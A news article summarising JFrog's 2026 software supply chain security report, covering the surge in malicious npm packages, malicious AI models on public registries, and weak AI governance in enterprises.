JFrog report recaps a tumultuous year in supply chain security
Calendar year 2025 not only broke records for code package proliferation; it also redefined the foundational architecture of the software supply chain. Bad actors then turned this into a high-value target.
For CISOs and security professionals, the structural shifts driven by AI are forcing a reckoning: the security perimeter is no longer just the code they write or the open-source dependencies they pull. It’s now the vast, ungoverned realm of AI models and agentic development tools themselves.
According to the 58-page JFrog Software Supply Chain Security State of the Union 2026, released this week, the threat landscape is expanding in all directions. JFrog warns that AI is “no longer an emerging consideration in the software supply chain. It is the supply chain.”
The data confirms an immediate crisis, showing that risk is rapidly expanding across dependencies, binaries, and newly introduced AI artifacts. Existing security controls cannot keep pace. The report aims to motivate security decision-makers to move from reactive patching to systemic control of software risk.
“The software attack surface has fundamentally shifted upstream; attackers are actively weaponizing IDE extensions, MCP servers, open-source binaries, and developer tools to launch instantaneous attacks on first-time usage, using the developer’s workstation.”
“The software attack surface has fundamentally shifted upstream; attackers are actively weaponizing IDE extensions, MCP servers, open-source binaries, and developer tools to launch instantaneous attacks on first-time usage, using the developer’s workstation,” JFrog CISO Paul Davis tells The New Stack.
“This shift has created a fundamental disconnect between executive perception of how well they think they are protected and actual operational reality. And it’s not just traditional software development.
“While 97% of organizations claim they have certified AI governance of the components they use to build new AI-enabled solutions, nearly a fifth have absolutely no active enforcement over the intelligent tools operating inside their developers’ workflows. Governance that exists only on paper isn’t a security control — it’s a dangerous assumption.”
“Governance that exists only on paper isn’t a security control — it’s a dangerous assumption.”
Standout data points from the report:
- The 2026 threat landscape is expanding in all directions. While 2025 was the most dangerous year on record for npm users, a massive new attack surface of AI models and agentic developer tools opened up alongside it. Malicious npm packages (the default package manager for JavaScript and Node.js) are infected libraries injected into the Node Package Manager registry. Once installed, these packages immediately execute malicious scripts to steal credentials, deploy backdoors, or inject wallet-drainers.
- Governance cannot keep up with AI development. While enterprises are rapidly adopting AI development tools, models, and protocols, governance guardrails for these new surfaces remain stuck in neutral. AI is no longer an emerging consideration in the software supply chain; it is becoming the supply chain.
- Not all reported vulnerabilities are what they appear. Volume-based triage is failing security teams. Having more CVEs (common vulnerabilities and exposures) to chase doesn’t mean more actual risk; it means more noise.
The sheer velocity of code ingestion is a major factor driving this expansion. In 2025, 11.7 million new packages flooded software supply chains, marking an astounding 67% increase from the previous year. This growth isn’t just sudden volume growth; it’s a structural realignment affecting the ecosystem, JFrog said.
The report notes that npm officially overtook Apache Maven as the most-used package ecosystem by traffic, with 400,000 new packages compared to Maven’s 98,000. In a parallel move signaling the industry’s shift toward modern data science and machine learning, PyPI passed YUM, indicating that AI/ML workload issues are displacing legacy infrastructure concerns.
This change in package preference coincided with what the report calls the “most dangerous year on record for npm users.” The malicious activity was not incremental; it blew up by a jaw-dropping 451%. Clearly, bad actors have found a new niche.
Attackers launched three major hijack campaigns that resulted in more than 2 million compromised downloads and 171,592 unique instances of malicious npm packages, JFrog said. This escalation underscores how reliance on large, publicly accessible registries, particularly those powering front-end and dynamic workloads, presents a critical, exploited vulnerability for software makers.
Security experts are way behind the eight-ball on this one.
Notable long-term risk emerges
A significant long-term risk stems from the AI adoption curve outstripping governance capabilities, JFrog said. While enterprises are rapidly integrating AI development tools, models, and protocols, governance frameworks for these new attack surfaces remain “nascent or aspirational,” the report says. The numbers highlight a profound chasm: 41% of enterprises are actively using AI and ML libraries (the software packages that connect applications to AI models and services), up from 34% in 2024. Moreover, the average organization is now managing 47% more of these packages than last year, as teams move rapidly from relying on a single AI service to building across several services simultaneously.
The danger, JFrog said, is compounded by engineering teams’ readiness to pull models directly from public sources. A concerning 53% of organizations are pulling AI models straight from public registries. Furthermore, 53% of organizations self-host AI models in some form, often sourcing them from platforms such as Hugging Face and similar registries.
The risks of this practice are evidenced by the detection of 495 malicious models on these public registries, JFrog said. Yet, in a testament to the governance disconnect, a whopping 97% of enterprises claim to have certified model governance in place, a figure the report’s malicious model data sharply contradicts.
Operational burdens cited as a major problem
The operational burden of modern security further illustrates the problem. Nearly half (48%) of enterprises said they require a week or more to generate audit-proof compliance. This lack of agility in demonstrating compliance is symptomatic of legacy, siloed security practices that cannot keep pace with the speed of AI-driven development, JFrog said.
The high-level message from the JFrog report: The attack surface has metastasized. Software makers are contending with a perfect storm — an unprecedented volume of packages, an onslaught of malicious dependencies, and an AI gold rush in which speed has sidelined security governance. Moving forward requires a data-justified shift from simply managing CVE noise to strategically controlling the entire software risk surface, especially as AI artifacts dominate the supply chain narrative.
JFrog serves as the system of record for thousands of global enterprises and more than 80% of the Fortune 100. The JFrog Software Supply Chain Platform has insights across billions of software artifacts. This report is the resulting analysis of that data, combined with independent vulnerability research by the JFrog Security Research team and commissioned third-party survey responses from 1,508 security, development, and operations professionals across eight countries.
